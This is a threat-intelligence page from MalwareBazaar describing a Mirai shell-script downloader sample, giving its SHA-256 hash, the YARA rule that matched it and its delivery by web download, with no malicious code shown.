Please note that we are no longer able to provide a coverage score for Virus Total.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:Linux_Shellscript_Downloader
Author:albertzsigovits
Description:Generic Approach to Shellscript downloaders

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Mirai

sh b7bfaf45eef40e028b2ad7086d113547c7d7514b3f5e93ff4d6d9554a46bc6dc

(this sample)

  
Delivery method
Distributed via web download

Comments